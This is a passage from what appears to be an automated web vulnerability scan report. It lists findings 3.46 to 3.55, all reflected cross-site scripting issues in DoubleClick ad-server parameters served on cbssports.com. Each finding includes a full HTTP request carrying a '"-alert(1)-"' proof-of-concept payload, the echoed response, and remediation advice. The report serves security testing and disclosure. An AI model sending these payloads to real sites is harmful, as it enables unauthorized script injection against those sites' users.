User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:25:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6998

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=9fa1d"-alert(1)-"0003816d0c&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl = url;
var fscUrlCl
...[SNIP]...

3.46. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [pt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a48fa"-alert(1)-"74ddc92bd84 was submitted in the pt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866a48fa"-alert(1)-"74ddc92bd84&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:23:00 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
07-300/250%3B41862222/41880009/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511522%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866a48fa"-alert(1)-"74ddc92bd84&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=201
...[SNIP]...

3.47. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [ra parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the ra request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f12e"-alert(1)-"b0679799619 was submitted in the ra parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.2434f12e"-alert(1)-"b0679799619&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:26:11 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.2434f12e"-alert(1)-"b0679799619&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
v
...[SNIP]...

3.48. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [rqid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d526e"-alert(1)-"a35697c3090 was submitted in the rqid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385d526e"-alert(1)-"a35697c3090&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:24:22 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
2%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385d526e"-alert(1)-"a35697c3090&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/http://www.mostlivesports.com/?dfaid=
...[SNIP]...

3.49. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [sg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4924b"-alert(1)-"e04afa304fa was submitted in the sg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=5115224924b"-alert(1)-"e04afa304fa&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
t/click%3Bh%3Dv8/3af6/17/175/%2a/f%3B240390296%3B0-0%3B0%3B63194397%3B4307-300/250%3B41862222/41880009/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511522%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15648&sg=5115224924b"-alert(1)-"e04afa304fa&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbsspor
...[SNIP]...

3.50. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c93a5"-alert(1)-"a1432e838ab was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175c93a5"-alert(1)-"a1432e838ab&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:22:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
397%3B4307-300/250%3B41862222/41880009/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511522%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175c93a5"-alert(1)-"a1432e838ab&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT
...[SNIP]...

3.51. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3dbe2"-alert(1)-"5a7ce4f1f97 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=156483dbe2"-alert(1)-"5a7ce4f1f97&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
leclick.net/click%3Bh%3Dv8/3af6/17/175/%2a/f%3B240390296%3B0-0%3B0%3B63194397%3B4307-300/250%3B41862222/41880009/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511522%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=156483dbe2"-alert(1)-"5a7ce4f1f97&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=w
...[SNIP]...

3.52. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81f2c"-alert(1)-"a9944300532 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.5181f2c"-alert(1)-"a9944300532&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:26:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
id=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.5181f2c"-alert(1)-"a9944300532&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var open
...[SNIP]...

3.53. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [b parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb6a1"-alert(1)-"2fce02e725 was submitted in the b parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59cb6a1"-alert(1)-"2fce02e725&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:02:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6950

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
240391556%3B0-0%3B0%3B63194441%3B4307-300/250%3B41864997/41882784/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59cb6a1"-alert(1)-"2fce02e725&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tb
...[SNIP]...

3.54. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a85c1"-alert(1)-"a850f38534d was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=a85c1"-alert(1)-"a850f38534d&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:05:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
0%3B41864997/41882784/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=a85c1"-alert(1)-"a850f38534d&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&even
...[SNIP]...

3.55. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [count parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c402c"-alert(1)-"b9372fb4719 was submitted in the count parameter. This input was echoed unmodified in the application's response.

